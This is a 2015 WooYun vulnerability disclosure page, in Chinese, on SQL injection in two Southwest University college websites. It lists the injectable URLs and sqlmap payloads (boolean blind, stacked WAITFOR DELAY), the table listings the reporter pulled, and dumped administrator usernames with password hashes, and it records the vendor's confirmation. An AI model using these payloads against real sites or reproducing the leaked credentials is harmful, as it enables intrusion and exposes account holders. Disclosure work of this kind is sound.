西南大学两学院存在SQL注入 | wooyun-2015-0154975| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0154975

漏洞标题：西南大学两学院存在SQL注入

漏洞作者：路人甲

提交时间：2015-11-23 11:53

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-23：细节已通知厂商并且等待厂商处理中
2015-11-23：厂商已经确认，细节仅向厂商公开
2015-12-03：细节向核心白帽子及相关领域专家公开
2015-12-13：细节向普通白帽子公开
2015-12-23：细节向实习白帽子公开
2016-01-11：细节向公众公开

简要描述：

详细说明：

西南大学纺织服装学院存在sql注入
注入点：
http://fzfzxy.swu.edu.cn/fzfz/doc.php?wid=8915&lid=162

sqlmap identified the following injection point(s) with a total of 234 HTTP(s) requests:
---
Parameter: wid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: wid=8915 AND 6794=6794&lid=162
---
web application technology: PHP 4.3.11, Apache 1.3.33
back-end DBMS: MySQL < 4.0.0

漏洞证明：

注入点：
http://epcdb.swu.edu.cn/xianview2.aspx?type=3&id=861

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: type=3&id=861 AND 8340=8340
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: type=3&id=861;WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
available databases [8]:
[*] master
[*] model
[*] msdb
[*] Race
[*] race20150113
[*] race20150220
[*] racebak
[*] tempdb

直接—tables跑不出表的内容，那么手工select：

crosoft SQL Server 2008
select name from Race..sysobjects where xtype='u' [18]:
[*] Areas
[*] areastype
[*] dt_Administrator
[*] dt_AllReviews
[*] dt_Article
[*] dt_Channel
[*] dt_Contents
[*] dt_Downloads
[*] FORMALYB
[*] FORMALYB_temp
[*] formalyb2
[*] FORMALYB2012
[*] FORMALYB20150223
[*] IndexList
[*] TjnjList
[*] userlist
[*] userlog
[*] xj35

dt_Administrator的字段名：

管理员用户密码：
select username,userpwd from dt_Administrator [2]:
[*] admin, 21CCC7C652A9922D62151A46926DBB21
[*] quguichuan, 21CCC7C652A9922D62151A46926DBB21

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：9

确认时间：2015-11-23 14:18

厂商回复：

纺织服装学院正在建设新的网站系统。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0154975

漏洞标题：西南大学两学院存在SQL注入

相关厂商：西南大学

漏洞作者：路人甲

提交时间：2015-11-23 11:53

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0154975

漏洞标题：西南大学两学院存在SQL注入

相关厂商：西南大学

漏洞作者： 路人甲

提交时间：2015-11-23 11:53

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0154975"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云